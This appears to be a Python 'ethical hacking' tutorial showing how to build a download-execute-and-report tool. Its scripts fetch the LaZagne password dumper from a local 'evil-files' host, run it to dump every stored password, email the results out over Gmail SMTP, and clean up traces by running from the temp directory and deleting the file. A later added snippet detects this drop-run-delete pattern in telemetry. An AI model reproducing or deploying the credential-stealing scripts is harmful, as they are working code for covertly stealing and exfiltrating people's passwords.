• Python Ethical Hacking


    DOWNLOAD_FILE

    • Download files on a system.
    • Once packaged properly will work on all operating systems.
    • Simple but powerful.

    Can be used in many situations:

    • download_file + execute_command = download_and_execute
    • download_file + execute_and_report = download_execute_and_report
    • ...etc

    #!/usr/bin/env python
    import requests
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg")

    DOWNLOAD_EXECUTE_AND_REPORT

    • Download files on a system.
    • Execute a command that uses this file.
    • Report results in our email.
    • Cross-platform.

    Ex: remotely steal all stored passwords on a computer!

    Using the LaZagne tool: https://github.com/AlessandroZ/LaZagne

    lazagne.exe --help

    Use the following command to find all the passwords on the current system.

    lazagne.exe all

    Steal saved passwords remotely

    #!/usr/bin/env python
    import requests
    import smtplib
    import subprocess
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()
    
    
    download("http://10.0.0.43/evil-files/lazagne.exe")
    result = subprocess.check_output("lazagne.exe all", shell=True)
    print(result.decode())
    send_mail("aaaa@gmail.com", "1111111", result)

    Optimize the Python script by interacting with the file system: the evil file is downloaded into the temp directory and removed after it has been executed.

    #!/usr/bin/env python
    import os
    import smtplib
    import subprocess
    import requests
    import tempfile
    
    
    def download(url):
        get_response = requests.get(url)
        file_name = url.split("/")[-1]
        with open(file_name, "wb") as out_file:
            out_file.write(get_response.content)
    
    
    def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        server.sendmail(email, email, message)
        server.quit()
    
    
    temp_directory = tempfile.gettempdir()
    os.chdir(temp_directory)
    download("http://10.0.0.43/evil-files/lazagne.exe")
    result = subprocess.check_output("lazagne.exe all", shell=True)
    print(result.decode())
    send_mail("aaaa@gmail.com", "1111111", result)
    os.remove("lazagne.exe")
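
From the defender's side, the script above leaves a recognisable sequence in endpoint telemetry: one process writes an executable into the temp directory, runs it, connects to SMTP port 587 and deletes the file. The following correlation check is an added example, not code from the original post; the event tuples, their field layout, the file names and the 5-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed correlation window
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "/tmp/")
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat")

# Constructed sample events: (timestamp, kind, acting pid, detail).
# For proc_create the pid is the parent and the detail is the child image path.
EVENTS = [
    ("2024-01-01T10:00:01", "file_create", 4120, r"C:\Users\bob\AppData\Local\Temp\tool.exe"),
    ("2024-01-01T10:00:02", "proc_create", 4120, r"C:\Users\bob\AppData\Local\Temp\tool.exe"),
    ("2024-01-01T10:00:09", "net_connect", 4120, "smtp.example.com:587"),
    ("2024-01-01T10:00:10", "file_delete", 4120, r"C:\Users\bob\AppData\Local\Temp\tool.exe"),
    # Benign-looking installer: dropped and run, but never deleted by its parent.
    ("2024-01-01T10:03:00", "file_create", 5555, r"C:\Users\bob\AppData\Local\Temp\setup.exe"),
    ("2024-01-01T10:03:05", "proc_create", 5555, r"C:\Users\bob\AppData\Local\Temp\setup.exe"),
]


def is_temp_exec(path):
    """True for an executable-type file located under a temp directory."""
    p = path.lower()
    return any(marker in p for marker in TEMP_MARKERS) and p.endswith(EXEC_EXT)


def find_drop_run_delete(events):
    """Flag processes that drop, run and delete a temp executable within WINDOW."""
    dropped = {}        # (pid, path) -> {"created": datetime, "ran": bool}
    smtp_pids = set()   # pids seen connecting to the SMTP submission port
    findings = []
    for ts, kind, pid, detail in sorted(events):
        when = datetime.fromisoformat(ts)
        key = (pid, detail.lower())
        if kind == "file_create" and is_temp_exec(detail):
            dropped[key] = {"created": when, "ran": False}
        elif kind == "proc_create" and key in dropped:
            dropped[key]["ran"] = True
        elif kind == "net_connect" and detail.endswith(":587"):
            smtp_pids.add(pid)
        elif kind == "file_delete" and key in dropped:
            state = dropped.pop(key)
            if state["ran"] and when - state["created"] <= WINDOW:
                findings.append({"pid": pid, "path": detail,
                                 "smtp_submission": pid in smtp_pids})
    return findings


if __name__ == "__main__":
    for finding in find_drop_run_delete(EVENTS):
        print(finding)
```
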
  • Original article: https://www.cnblogs.com/keepmoving1113/p/11616187.html